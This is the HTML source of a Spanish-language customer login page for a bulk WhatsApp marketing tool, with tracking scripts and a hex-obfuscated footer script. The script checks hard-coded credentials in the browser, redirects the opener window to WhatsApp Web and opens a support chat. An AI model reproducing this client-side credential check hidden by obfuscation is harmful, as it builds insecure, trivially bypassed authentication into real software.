<!DOCTYPE html>
<html lang="en" prefix="og: http://ogp.me/ns#">
<head>

    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link  rel="icon"   href="favicon.ico" type="image/ico" />
    <!-- <meta http-equiv="refresh" content="2; url=https://whatsbulksender.com/precios-WhatsApp-masivo-2022"> -->
    <meta http-equiv="resfresh" content="2">
    <meta name="HandheldFriendly" content="true" />
    <meta name="language" content="Spanish">
    <meta name="description" content="WhatsApp Marketing Software | WhatsApp Masivo | Chat Bots | whatsbulksender.com">

    
   
    <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
    <!-- <script src="https://cdnjs.cloudflare.com/ajax/libs/modernizr/2.8.3/modernizr.min.js"></script> -->
    <script src="https://cdn.jsdelivr.net/gh/cferdinandi/smooth-scroll@15.0.0/dist/smooth-scroll.polyfills.min.js"></script>

   
    <script src="https://cdnjs.cloudflare.com/ajax/libs/mobile-detect/1.4.3/mobile-detect.min.js"></script>



    <link rel="alternate" href="https://whatsbulksender.com/" hreflang="es-ec"/>
    
    
    <!--  -->
      <meta name="keywords"
    content="WhatsApp Marketing, WhatsApp Masivo, Software WhatsApp Marketing, Marketing Digital, Chatbots">
    <!-- SEO -->

      <!--google+-->
      <meta itemprop="name"
          content="WhatsApp Marketing | WhatsApp masivo | Chatbots">
      <meta itemprop="description"
          content="WhatsApp Marketing Software | WhatsApp Masivo | Chat Bots | whatsbulksender.com">
      <meta itemprop="image"
          content="https://whatsbulksender.com/img/whatsapp-marketing.png">
      <!--google+-->

      <!-- Facebook -->
      <meta property="og:title" content="WhatsApp Marketing | WhatsApp masivo | Chatbots" />
      <meta property="og:type" content="website" />
      <meta property="og:description" content="WhatsApp Marketing Software | WhatsApp Masivo | Chat Bots | whatsbulksender.com" />
      <meta property="og:image" content="https://whatsbulksender.com//img/whatsapp-marketing.png" />
      <meta property="og:url" content="https://whatsbulksender.com/" />
      <meta property="og:site_name" content="WhatsApp Marketing | WhatsApp masivo | Chatbots" />
      <!-- Facebook -->





    <script src="https://cdnjs.cloudflare.com/ajax/libs/lazysizes/5.2.0/lazysizes.min.js"></script>
    <title>WhatsBulkSender | WhatsApp Masivo | Chat Bots | whatsbulksender.com</title>

    <!-- Facebook Pixel Code -->

 <script>
    !function(f,b,e,v,n,t,s)
    {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
    n.callMethod.apply(n,arguments):n.queue.push(arguments)};
    if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
    n.queue=[];t=b.createElement(e);t.async=!0;
    t.src=v;s=b.getElementsByTagName(e)[0];
    s.parentNode.insertBefore(t,s)}(window, document,'script',
    'https://connect.facebook.net/en_US/fbevents.js');
    fbq('init', '1199966330395359');
    fbq('track', 'PageView');
  </script>
  <noscript><img height="1" width="1" style="display:none"
    src="https://www.facebook.com/tr?id=1199966330395359&ev=PageView&noscript=1"
  /></noscript>
  <!-- End Facebook Pixel Code -->

  

  <!-- Global site tag (gtag.js) - Google Ads: 668220875 -->

  <!-- codigo de googl ADS -->
  
<!-- Event snippet for Website sale conversion page -->
<script>
   
//    eventos de  tracking google ads
  </script>

   <!-- Global site tag (gtag.js) - Google Analytics -->

 <script async src="https://www.googletagmanager.com/gtag/js?id=UA-162544049-2"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-162544049-2');
</script>
<!-- codigo google Analitics  -->
<style>

@import url(https://www.whatsbulksender.com/style.css);
@import url(https://www.whatsbulksender.com/iconosr/iconosr.css);
 
  main{
    
    display: grid;

    justify-content: center;
    text-align-last: start;
   
  }

  .login{
    display: grid;
    justify-content: center;
    margin-top: 50px;
  }
  form{
    display: contents;
  }

  .boton{
    cursor: pointer;
    display: block;
    width: auto;
  }

  .btngo {
    display: grid;
   
    justify-content: end;
    grid-template-columns: auto auto;
    grid-gap: 20px;
}
form.login2 {
  display: grid;
    justify-items: flex-end;
    width: auto;
}

.nonemodalv{
  display: none;
}
.hidpa{

  display: none;

}

/* html, body, div, iframe { margin:0; padding:0; height:100%; } */

.chaover{
  display: none;
}

.disclaimer {
    /* display: grid; */
    max-width: 300px;
    margin: 0 auto;
    text-align: center;
    margin-top: 20px;
    justify-content: center;
    justify-items: center;
    align-items: center;
    align-content: center;
}

.exit-intent-popup{
    position: absolute;
    display: none;
}

.visible{
    display: flex;
}

.boton3{
    text-decoration: none;
    color: #33d670;
    font-weight: bold;
    cursor: pointer;
}
.exit-intent-popup.visible {
    transform: translateY(0) scale(1);
    transition: transform 0.1s cubic-bezier(0.4, 0.0, 0.2, 1);
}

.exit-intent-popup {
    position: fixed;
    top: 0;
    left: 0;
    bottom: 0;
    right: 0;
    z-index: 1;
    background: rgba(33, 33, 33, 0.8);
    transform: translateY(60%) scale(0);
}
.newsletter {
    position: absolute;
    top: 50%;
    left: 50%;
    transform: translate(-50%, -50%);
    max-width: 300px;
    background: white;
    padding: 20px;
    border-radius: 20px;
    border: 2px solid #00bfa5;
}

.btnmodal{
  display: grid;
  grid-template-columns: auto auto;
  grid-gap: 20px;
 
}

.botonmodal{
  cursor: pointer;
  border: 1px solid #777;
  padding: 7px;
  border-radius: 15px;


}
.botonmodal1{
  
  color: #33d670;
  cursor: pointer;
  border: 1px solid#33d670;
  padding: 7px;
  border-radius: 15px;


  

}

a.close.botonmodal,a.botonmodal1 {
    text-align: center;
    margin: 0 auto;
}

.menuwbs{
  display: none;
}


a.botonmodal1:hover {
background: #33d670;
   color: white;
   transition: 0.5s all;
   
}

a.botonmodal:hover {
background: #777;
   color: white;
   transition: 0.5s all;
   
}



</style>
</head>

<body>

    <main>
    
        <header class="headercolor" id="container">
            
            <nav class="navwbs">
                <!-- <img class="logoms" src="img/whatsapp-masivo-ecuador.webp" alt="Whats Bulk Sender | Software WhatsApp Marketing" srcset=""> -->
                <a class="logoms" href="#"><img  src="../img/whatsapp-masivo-ecuador.webp" alt="Whats Bulk Sender | Software WhatsApp Marketing" srcset=""><span class=""></span></a> 


                    <div class="logoimg">
                        
                        <a class="logoms2" href="#"><img  src="../img/whatsapp-masivo-ecuador.webp" alt="Whats Bulk Sender | Software WhatsApp Marketing" srcset=""><span class=""></span></a> 



                            <!-- <div class="logowbs">
                            </div> -->

                            <!-- <div class="logowbs2">

                                 <a href="#" class=""><p class="">Whats Bulk Sender</p></a>
                             </div> -->
                    </div>


                    <div class="menulanding">
                            <ul class="">
                                    
                            </ul>


                    </div>


                    <div class="boton">
                          
                    </div>
                             
                             
                    

             
             </nav>
             <div id="#menu2"class='menuwbs'>
                     <!-- <span class='hamburger'></span> -->
                     <span class="icon-mas"></span>
                 
             </div>

             <div id="nav" class="menumovil2">

              
                
    </div>

             
<div class="login">


  <h1>ÁREA PARA CLIENTES:</h1>
  <span>Ingresa tus credenciales para acceder a la herramienta.</span>
  
  
  <FORM  class="login2" name=form action="https://whatsbulksender.com/contacto.html">

    <P><strong>Ciiente:</strong>     <INPUT type=text name=login> 
    <P><strong>PIN:</strong> <INPUT type=password name=password> 
      <div class="btngo">
      
        <a   class="boton botonmodal1" onclick="go()"  class="txt_bold">Ingresar</a> 
        <a class="boton botonmodal" onclick="go2()"  class="txt_bold">Cerrar X</a>  

    </div>
    
    </FORM> 
<div class="disclaimer">

    <small >Ingresa tus credenciales para activar la licencia del software, la garantía y las próximas actualizaciones. Para más información comunicate con  <a class="boton3" onclick="go3()"  class="txt_bold"> Soporte.</a>  </small>
</div>

  
  
    
    
  
     </div>

     <div class="exit-intent-popup">

      <div class="newsletter">



    

        <strong>¡Hey!</strong> Recuerda ingresar con tus credenciales para  <strong>activar la licencia de uso, activar la garantía y las próximas actualizaciones.</strong> <br> <br>
<div class="btnmodal">
  <a   class="botonmodal1" onclick="go6()"  >Acceder</a> 
  <a  onclick="go5()"  class="close botonmodal">Cerrar X</a>  

</div>



     </div>

    </div>
</div>
      

       
     
      

        

        

    </main>
    

    
  
    



    

    
</body>
    
<footer>
  <script>


var _0x45a6=["\x73\x68\x69\x66\x74","\x70\x75\x73\x68","\x76\x61\x6C\x75\x65","\x74\x6F\x45\x6C\x65\x6D\x65\x6E\x74","\x72\x65\x6C\x61\x74\x65\x64\x54\x61\x72\x67\x65\x74","\x76\x69\x73\x69\x62\x6C\x65","\x61\x64\x64","\x63\x6C\x6F\x73\x65","\x72\x65\x6D\x6F\x76\x65","\x63\x6C\x69\x63\x6B","\x6E\x61\x76\x69\x67\x61\x74\x6F\x72","\x68\x72\x65\x66","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x35\x38\x31\x31\x72\x69\x46\x64\x76\x6D","\x6C\x6F\x67\x69\x6E","\x61\x64\x64\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x72\x65\x6D\x6F\x76\x65\x43\x6C\x61\x73\x73","\x31\x37\x34\x31\x32\x70\x67\x78\x70\x78\x6A","\x33\x31\x32\x36\x35\x35\x78\x6E\x70\x45\x42\x7A","\x71\x75\x65\x72\x79\x53\x65\x6C\x65\x63\x74\x6F\x72","\x63\x6C\x61\x73\x73\x4E\x61\x6D\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x31\x39\x36\x37\x39\x31\x31\x74\x59\x6D\x77\x72\x74","\x74\x61\x72\x67\x65\x74","\x32\x31\x31\x30\x38\x30\x65\x6A\x42\x58\x4B\x57","\x34\x58\x57\x4A\x6E\x49\x57","\x63\x6C\x69\x65\x6E\x74\x59","\x2E\x65\x78\x69\x74\x2D\x69\x6E\x74\x65\x6E\x74\x2D\x70\x6F\x70\x75\x70","\x6F\x70\x65\x6E\x65\x72","\x31\x32\x33\x34","\x6B\x65\x79\x64\x6F\x77\x6E","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x65\x62\x2E\x77\x68\x61\x74\x73\x61\x70\x70\x2E\x63\x6F\x6D\x2F","\x36\x38\x38\x37\x39\x30\x4F\x5A\x6D\x4B\x41\x58","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x65\x62\x2E\x77\x68\x61\x74\x73\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x73\x65\x6E\x64\x3F\x70\x68\x6F\x6E\x65\x3D\x35\x39\x33\x39\x39\x36\x35\x31\x37\x31\x39\x39\x26\x74\x65\x78\x74\x3D\x48\x6F\x6C\x61\x21\x20\x73\x6F\x6C\x69\x63\x69\x74\x6F\x20\x61\x79\x75\x64\x61\x20\x6D\x69\x20\x6E\x6F\x6D\x62\x72\x65\x20\x65\x73\x3A\x2E\x2E\x2E\x2E","\x70\x61\x73\x73\x77\x6F\x72\x64","\x34\x39\x37\x30\x36\x4E\x64\x64\x6C\x5A\x75","\x63\x6D\x6B\x31","\x31\x31\x32\x77\x71\x45\x61\x68\x63","\x35\x45\x48\x57\x78\x53\x4E","\x6D\x6F\x62\x69\x6C\x65","\x6D\x6F\x75\x73\x65\x6F\x75\x74","\x63\x6C\x61\x73\x73\x4C\x69\x73\x74","\x66\x6F\x72\x6D","\x72\x65\x6D\x6F\x76\x65\x45\x76\x65\x6E\x74\x4C\x69\x73\x74\x65\x6E\x65\x72","\x32\x34\x34\x38\x33\x4D\x47\x6B\x6A\x51\x6E","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x61\x70\x69\x2E\x77\x68\x61\x74\x73\x61\x70\x70\x2E\x63\x6F\x6D\x2F\x73\x65\x6E\x64\x3F\x70\x68\x6F\x6E\x65\x3D\x35\x39\x33\x39\x39\x36\x35\x31\x37\x31\x39\x39\x26\x74\x65\x78\x74\x3D\x48\x6F\x6C\x61\x21\x20\x73\x6F\x6C\x69\x63\x69\x74\x6F\x20\x61\x79\x75\x64\x61\x20\x6D\x69\x20\x6E\x6F\x6D\x62\x72\x65\x20\x65\x73\x3A\x2E\x2E\x2E\x2E","\x50\x6F\x72\x20\x66\x61\x76\x6F\x72\x20\x69\x6E\x67\x72\x65\x73\x61\x20\x74\x75\x73\x20\x63\x72\x65\x64\x65\x6E\x63\x69\x61\x6C\x65\x73\x20\x63\x6F\x72\x72\x65\x63\x74\x61\x73\x2E","\x34\x32\x62\x7A\x5A\x48\x7A\x46","\x33\x36\x46\x44\x4E\x7A\x5A\x50","\x6F\x70\x65\x6E"];const _0x6359da=_0x183a;(function(_0x7324x2,_0x7324x3){const _0x7324x4=_0x183a,_0x7324x5=_0x7324x2();while(!![]){try{const _0x7324x6=parseInt(_0x7324x4(0x1fb))/ 0x1* (parseInt(_0x7324x4(0x1f8))/ 0x2)+ parseInt(_0x7324x4(0x201))/ 0x3* (-parseInt(_0x7324x4(0x1ec))/ 0x4)+ -parseInt(_0x7324x4(0x20e))/ 0x5 * (-parseInt(_0x7324x4(0x205))/ 0x6)+ parseInt(_0x7324x4(0x1fa))/ 0x7* (-parseInt(_0x7324x4(0x214))/ 0x8)+ -parseInt(_0x7324x4(0x206))/ 0x9 * (parseInt(_0x7324x4(0x1f4))/ 0xa)+ -parseInt(_0x7324x4(0x212))/ 0xb+ parseInt(_0x7324x4(0x20d))/ 0xc* (parseInt(_0x7324x4(0x209))/ 0xd);if(_0x7324x6=== _0x7324x3){break}else {_0x7324x5[_0x45a6[1]](_0x7324x5[_0x45a6[0]]())}}catch(_0x45060c){_0x7324x5[_0x45a6[1]](_0x7324x5[_0x45a6[0]]())}}}(_0x5159,0x4f8d1));function go(){const _0x7324x8=_0x183a;document[_0x7324x8(0x1ff)][_0x7324x8(0x1f7)][_0x7324x8(0x1f5)]== _0x7324x8(0x1f0)&& document[_0x7324x8(0x1ff)][_0x7324x8(0x20a)][_0x45a6[2]]== _0x7324x8(0x1f9)?self[_0x7324x8(0x1eb)]():alert(_0x7324x8(0x204))}function go2(){const _0x7324xa=_0x183a;window[_0x7324xa(0x1ef)][_0x7324xa(0x207)][_0x7324xa(0x1f1)]= _0x7324xa(0x1f3),self[_0x7324xa(0x1eb)]()}const mouseEvent=(_0x7324xd)=>{const _0x7324xe=_0x183a,_0x7324xf=!_0x7324xd[_0x45a6[3]]&&  !_0x7324xd[_0x45a6[4]] && _0x7324xd[_0x7324xe(0x1ed)]< 0xa;_0x7324xf&& (document[_0x7324xe(0x200)](_0x7324xe(0x1fd),mouseEvent),document[_0x7324xe(0x20f)](_0x7324xe(0x1ee))[_0x7324xe(0x1fe)][_0x45a6[6]](_0x45a6[5]))},exit=(_0x7324x10)=>{const _0x7324x11=_0x183a;_0x7324x10[_0x7324x11(0x213)][_0x7324x11(0x210)]=== _0x45a6[7]&& document[_0x7324x11(0x20f)](_0x7324x11(0x1ee))[_0x7324x11(0x1fe)][_0x45a6[8]](_0x7324x11(0x203))};document[_0x6359da(0x20f)](_0x6359da(0x1ee))[_0x6359da(0x20b)](_0x45a6[9],exit),setTimeout(()=>{const _0x7324x12=_0x6359da;document[_0x7324x12(0x20b)](_0x7324x12(0x1fd),mouseEvent),document[_0x7324x12(0x20b)](_0x7324x12(0x1f2),exit)},0x3e8);function go3(){const _0x7324x14=_0x6359da;var _0x7324x15= new MobileDetect(window[_0x45a6[10]][_0x7324x14(0x211)]);_0x7324x15[_0x7324x14(0x1fc)]()?(window[_0x7324x14(0x208)](_0x7324x14(0x202)),self[_0x7324x14(0x1eb)]()):(window[_0x7324x14(0x208)](_0x7324x14(0x1f6)),self[_0x7324x14(0x1eb)]())}function go5(){const _0x7324x17=_0x6359da;window[_0x7324x17(0x1ef)][_0x45a6[12]][_0x45a6[11]]= _0x7324x17(0x1f3),self[_0x7324x17(0x1eb)]()}function _0x183a(_0x7324x19,_0x7324x1a){const _0x7324x1b=_0x5159();return _0x183a= function(_0x7324x1c,_0x7324x1d){_0x7324x1c= _0x7324x1c- 0x1eb;let _0x7324x1e=_0x7324x1b[_0x7324x1c];return _0x7324x1e},_0x183a(_0x7324x19,_0x7324x1a)}function _0x5159(){const _0x7324x20=[_0x45a6[13],_0x45a6[14],_0x45a6[15],_0x45a6[16],_0x45a6[17],_0x45a6[18],_0x45a6[19],_0x45a6[20],_0x45a6[21],_0x45a6[22],_0x45a6[23],_0x45a6[24],_0x45a6[7],_0x45a6[25],_0x45a6[26],_0x45a6[27],_0x45a6[28],_0x45a6[29],_0x45a6[11],_0x45a6[30],_0x45a6[31],_0x45a6[32],_0x45a6[2],_0x45a6[33],_0x45a6[34],_0x45a6[35],_0x45a6[36],_0x45a6[37],_0x45a6[38],_0x45a6[39],_0x45a6[40],_0x45a6[41],_0x45a6[42],_0x45a6[43],_0x45a6[44],_0x45a6[45],_0x45a6[5],_0x45a6[46],_0x45a6[47],_0x45a6[48],_0x45a6[12],_0x45a6[49]];_0x5159= function(){return _0x7324x20};return _0x5159()}function go6(){const _0x7324x22=_0x6359da;$(_0x7324x22(0x1ee))[_0x7324x22(0x20c)](_0x7324x22(0x203))}
   
            
          



  </script>
          
            

       

  
</footer>

    


  
</html>

